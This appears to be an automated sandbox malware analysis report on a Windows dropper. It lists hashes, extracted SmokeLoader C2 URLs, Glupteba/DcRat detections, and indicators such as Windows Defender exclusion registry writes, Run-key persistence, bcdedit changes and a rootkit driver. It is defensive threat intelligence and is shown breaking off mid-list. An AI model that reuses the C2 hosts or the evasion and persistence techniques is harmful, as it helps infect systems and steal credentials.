Resubmissions
08-02-2024 19:00
240208-xnla2ahe7z 1008-02-2024 07:34
240208-jd5p2aefen 1008-02-2024 04:47
240208-fevdxabb9y 10Analysis
-
max time kernel
414s -
max time network
599s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
08-02-2024 19:00
Static task
static1
General
-
Target
1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe
-
Size
5.5MB
-
MD5
c4580e8db0c3dbc88891842fd8a31158
-
SHA1
744f03fcf10db1459d3f40beaea2bfe1b000582b
-
SHA256
1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922
-
SHA512
cefd412e0d5aba56d6603fdc46a056474ce387dbb220b32a9317dca0822bef9320515afacc2ab2086db46f9e01b3456c87a0dc83bd99c246550d87efd3606945
-
SSDEEP
98304:Fs9EI6sZJrf04Hr3VvPkrcRizJ6krK4JLQaEHlXU+vG9G1jMaZQRrkp:W+I6sU4HjZkwkVJo1+G1jMaZQpk
Malware Config
Extracted
smokeloader
pub1
Extracted
smokeloader
2022
http://trad-einmyus.com/index.php
http://tradein-myus.com/index.php
http://trade-inmyus.com/index.php
Signatures
-
DcRat 6 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Processes:
netsh.exed21cbe21e38b385a41a68c5e6dd32f4c.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 768 netsh.exe Set value (str) \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" d21cbe21e38b385a41a68c5e6dd32f4c.exe 2776 schtasks.exe 1728 schtasks.exe 612 schtasks.exe 1284 schtasks.exe -
Detect Fabookie payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/2708-296-0x0000000003850000-0x000000000397C000-memory.dmp family_fabookie behavioral1/memory/2708-330-0x0000000003850000-0x000000000397C000-memory.dmp family_fabookie -
Glupteba payload 22 IoCs
Processes:
resource yara_rule behavioral1/memory/2700-43-0x0000000002B30000-0x000000000341B000-memory.dmp family_glupteba behavioral1/memory/2700-44-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/2700-47-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/2736-50-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/2736-59-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/2904-124-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/2904-211-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/2904-254-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/2904-292-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/2904-334-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/2904-337-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/2904-375-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/2904-402-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/2904-421-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/2904-423-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/2904-454-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/2904-456-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/2904-459-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/2904-470-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/1236-643-0x0000000002AB0000-0x000000000339B000-memory.dmp family_glupteba behavioral1/memory/1236-644-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/1236-646-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Processes:
d21cbe21e38b385a41a68c5e6dd32f4c.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\d21cbe21e38b385a41a68c5e6dd32f4c.exe = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe -
Modifies boot configuration data using bcdedit 14 IoCs
Processes:
bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exepid process 1236 bcdedit.exe 1684 bcdedit.exe 2960 bcdedit.exe 1268 bcdedit.exe 1092 bcdedit.exe 2700 bcdedit.exe 2672 bcdedit.exe 2876 bcdedit.exe 1936 bcdedit.exe 596 bcdedit.exe 1772 bcdedit.exe 1820 bcdedit.exe 2580 bcdedit.exe 2884 bcdedit.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
csrss.exedescription ioc process File created C:\Windows\system32\drivers\Winmon.sys csrss.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
Processes:
netsh.exepid process 768 netsh.exe -
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Executes dropped EXE 21 IoCs
Processes:
InstallSetup_nine.exed21cbe21e38b385a41a68c5e6dd32f4c.exerty25.exetoolspub1.exed21cbe21e38b385a41a68c5e6dd32f4c.execsrss.exeu110.0.exepatch.exeinjector.exeu110.1.exeD587.exedsefix.exewindefender.exewindefender.exeA4D8.exedcb505dc2b9d8aac05f4ca0727f5eadb.exeurhaiea713674d5e968cbe2102394be0b2bae6f.exewup.execsrss.exe1bf850b4d9587c1017a75a47680584c4.exepid process 1332 InstallSetup_nine.exe 2700 d21cbe21e38b385a41a68c5e6dd32f4c.exe 2708 rty25.exe 2884 toolspub1.exe 2736 d21cbe21e38b385a41a68c5e6dd32f4c.exe 2904 csrss.exe 1668 u110.0.exe 1944 patch.exe 1596 injector.exe 1740 u110.1.exe 1636 D587.exe 2332 dsefix.exe 2096 windefender.exe 2040 windefender.exe 2748 A4D8.exe 2616 dcb505dc2b9d8aac05f4ca0727f5eadb.exe 1684 urhaiea 996 713674d5e968cbe2102394be0b2bae6f.exe 1972 wup.exe 1236 csrss.exe 1572 1bf850b4d9587c1017a75a47680584c4.exe -
Loads dropped DLL 43 IoCs
Processes:
1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exed21cbe21e38b385a41a68c5e6dd32f4c.exeInstallSetup_nine.exepatch.execsrss.exeu110.0.exeWerFault.exedcb505dc2b9d8aac05f4ca0727f5eadb.exepid process 2424 1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe 2424 1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe 2424 1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe 2424 1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe 2424 1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe 2424 1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe 2736 d21cbe21e38b385a41a68c5e6dd32f4c.exe 2736 d21cbe21e38b385a41a68c5e6dd32f4c.exe 1332 InstallSetup_nine.exe 1332 InstallSetup_nine.exe 1332 InstallSetup_nine.exe 1332 InstallSetup_nine.exe 1332 InstallSetup_nine.exe 852 1944 patch.exe 1944 patch.exe 1944 patch.exe 1944 patch.exe 1944 patch.exe 2904 csrss.exe 1332 InstallSetup_nine.exe 1332 InstallSetup_nine.exe 1332 InstallSetup_nine.exe 1332 InstallSetup_nine.exe 1668 u110.0.exe 1668 u110.0.exe 1944 patch.exe 1944 patch.exe 1944 patch.exe 2904 csrss.exe 1960 WerFault.exe 1960 WerFault.exe 1960 WerFault.exe 1960 WerFault.exe 1960 WerFault.exe 2904 csrss.exe 2904 csrss.exe 2904 csrss.exe 2904 csrss.exe 2616 dcb505dc2b9d8aac05f4ca0727f5eadb.exe 2616 dcb505dc2b9d8aac05f4ca0727f5eadb.exe 2904 csrss.exe 2904 csrss.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Windows\windefender.exe upx behavioral1/memory/2096-463-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral1/memory/2096-467-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral1/memory/2040-466-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral1/memory/2040-469-0x0000000000400000-0x00000000008DF000-memory.dmp upx \Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe upx behavioral1/memory/2904-602-0x000000002D660000-0x000000002DB41000-memory.dmp upx \Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe upx behavioral1/memory/996-629-0x0000000000010000-0x00000000008DD000-memory.dmp upx behavioral1/memory/2616-633-0x0000000000400000-0x00000000008E1000-memory.dmp upx behavioral1/memory/2904-635-0x000000002D660000-0x000000002DB41000-memory.dmp upx behavioral1/memory/2616-641-0x0000000000400000-0x00000000008E1000-memory.dmp upx behavioral1/memory/996-650-0x0000000000010000-0x00000000008DD000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe upx -
Processes:
d21cbe21e38b385a41a68c5e6dd32f4c.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\d21cbe21e38b385a41a68c5e6dd32f4c.exe = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
d21cbe21e38b385a41a68c5e6dd32f4c.execsrss.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Manipulates WinMon driver. 2 IoCs
Roottkits write to WinMon to hide PIDs from being detected.
Processes:
csrss.execsrss.exedescription ioc process File opened for modification \??\WinMon csrss.exe File opened for modification \??\WinMon csrss.exe -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
Processes:
csrss.exedescription ioc process File opened for modification \??\WinMonFS csrss.exe -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
Processes:
d21cbe21e38b385a41a68c5e6dd32f4c.exedescription ioc process File opened (read-only) \??\VBoxMiniRdrDN d21cbe21e38b385a41a68c5e6dd32f4c.exe -
Drops file in Windows directory 5 IoCs
Processes:
d21cbe21e38b385a41a68c5e6dd32f4c.exemakecab.execsrss.exedescription ioc process File created C:\Windows\rss\csrss.exe d21cbe21e38b385a41a68c5e6dd32f4c.exe File created C:\Windows\Logs\CBS\CbsPersist_20240208190338.cab makecab.exe File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\rss d21cbe21e38b385a41a68c5e6dd32f4c.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exepid process 2760 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1960 2748 WerFault.exe A4D8.exe -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
D587.exeurhaieatoolspub1.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI D587.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI D587.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI D587.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI urhaiea Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI urhaiea Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI urhaiea -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
u110.0.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 u110.0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString u110.0.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2776 schtasks.exe 1728 schtasks.exe 612 schtasks.exe 1284 schtasks.exe -
GoLang User-Agent 3 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes:
description flow ioc HTTP User-Agent header 135 Go-http-client/1.1 HTTP User-Agent header 201 Go-http-client/1.1 HTTP User-Agent header 212 Go-http-client/1.1 -
Modifies data under HKEY_USERS 64 IoCs
Processes:
windefender.exed21cbe21e38b385a41a68c5e6dd32f4c.exenetsh.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-32 = "Mid-Atlantic Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-772 = "Montevideo Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-132 = "US Eastern Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-291 = "Central European Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-571 = "China Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-272 = "Greenwich Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-501 = "Nepal Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-422 = "Russian Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-471 = "Ekaterinburg Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-491 = "India Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-301 = "Romance Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-791 = "SA Western Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-82 = "Atlantic Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-471 = "Ekaterinburg Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1472 = "Magadan Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1042 = "Ulaanbaatar Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-111 = "Eastern Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-435 = "Georgian Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-51 = "Greenland Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-362 = "GTB Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-961 = "Paraguay Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-532 = "Sri Lanka Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-302 = "Romance Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-872 = "Pakistan Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-42 = "E. South America Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-982 = "Kamchatka Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-561 = "SE Asia Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-401 = "Arabic Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-331 = "E. Europe Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-421 = "Russian Daylight Time" 